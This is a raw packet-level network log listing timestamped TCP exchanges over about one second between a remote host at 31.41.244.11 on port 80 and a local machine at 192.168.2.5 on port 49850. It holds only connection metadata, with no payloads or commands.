Dec 17, 2024 06:03:18.770122051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.770164967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.772248030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.772296906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.772579908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.772623062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.774744034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.774792910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.774818897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.774862051 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.776932955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.776978970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.777045965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.777089119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.779330015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.779391050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.779421091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.779464006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.781832933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.781843901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.781883001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.784051895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.784125090 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.784162998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.784240007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.786516905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.786529064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.786590099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.788830996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.788877964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.788912058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.788958073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.791196108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.791238070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.791316986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.791364908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.793504953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.793554068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.793697119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.793746948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.795900106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.795945883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.796065092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.796109915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.798245907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.798290968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.798440933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.798484087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.800813913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.800825119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.800863028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.803023100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.803070068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.803133011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.803174973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.805398941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.805443048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.805469990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.805512905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.807847977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.807858944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.807897091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.810174942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.810185909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.810215950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.810246944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.812494993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.812557936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.812589884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.812628031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.814834118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.814893007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.814918041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.814958096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.817239046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.817282915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.817321062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.817363977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.819638014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.819683075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.819766998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.819818974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.821949005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.821993113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.822103977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.822149992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.824337006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.824382067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.824443102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.824485064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.826669931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.826718092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.928710938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.928774118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.928781033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.928816080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.929677010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.929728985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.929733038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.929769039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.931675911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.931730032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.931766033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.931807041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.933626890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.933685064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.933691978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.933777094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.935540915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.935591936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.935636997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.935677052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.937432051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.937474012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.937531948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.937568903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.939384937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.939424992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.939428091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.939466953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.941196918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.941237926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.941307068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.941345930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.942996979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.943078041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.943104982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.943142891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.944863081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.944900990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.945004940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.945046902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.946609020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.946650028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.946691990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.946727991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.948388100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.948430061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.948502064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.948539019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.950128078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.950169086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.950318098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.950359106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.951891899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.951944113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.952002048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.952043056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.953588009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.953630924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.953700066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.953737974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.955393076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.955452919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.955456972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.955501080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.957073927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.957118034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.957192898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.957231045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.958853006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.958924055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.958966970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.959009886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.960587978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.960628986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.960701942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.960738897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.962399960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.962445021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.962472916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.962512016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.964114904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.964155912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.964195013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.964231014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.965811968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.965861082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.965934038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.965974092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.967567921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.967609882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.967710972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.967751980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.969302893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.969343901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.969372034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.969409943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.971041918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.971081972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.971168041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.971204996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.972790956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.972809076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.972836018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.972851992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.974529982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.974571943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.974622965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.974658012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.976289988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.976331949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.976383924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.976442099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.978028059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.978069067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.978126049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.978162050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.979758024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.979793072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.979803085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.979827881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.981502056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.981547117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.981607914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.981650114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.983285904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.983333111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.983361959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.983402967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.984986067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.985028028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.985064030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.985101938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.986702919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.986745119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.986814022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.986849070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.988486052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.988527060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.988586903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.988622904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.990269899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.990309000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.990386009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.990426064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.991967916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.992036104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.992089987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.992125034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.993763924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.993804932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.993885040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.993922949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.995420933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.995460987 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.995532036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.995582104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.997184992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.997226954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.997282028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.997320890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.998912096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.998955011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.999058962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.999095917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.000649929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.000694036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.000757933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.000797033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.002423048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.002468109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.002540112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.002576113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.004200935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.004245043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.004255056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.004292011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.005898952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.005939960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.006021976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.006064892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.007639885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.007679939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.007772923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.007808924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.009371996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.009413958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.009483099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.009526968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.011136055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.011173964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.011197090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.011230946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.012851954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.012900114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.012981892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.013019085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.014602900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.014642000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.014661074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.014697075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.016382933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.016438007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.016469955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.016505957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.018091917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.018132925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.018179893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.018223047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.019818068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.019855976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.120990038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.121079922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.121110916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.121149063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.121777058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.121822119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.121829033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.121855021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.123204947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.123255968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.123296022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.123337030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.124597073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.124648094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.124686003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.124722004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.126049995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.126091003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.126130104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.126169920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.127506971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.127547026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.127608061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.127646923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.128901958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.128946066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.128982067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.129019976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.130275011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.130320072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.130390882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.130424976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.131807089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.131866932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.131899118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.131948948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.133059025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.133126020 CET	49850	80	192.168.2.5	31.41.244.11
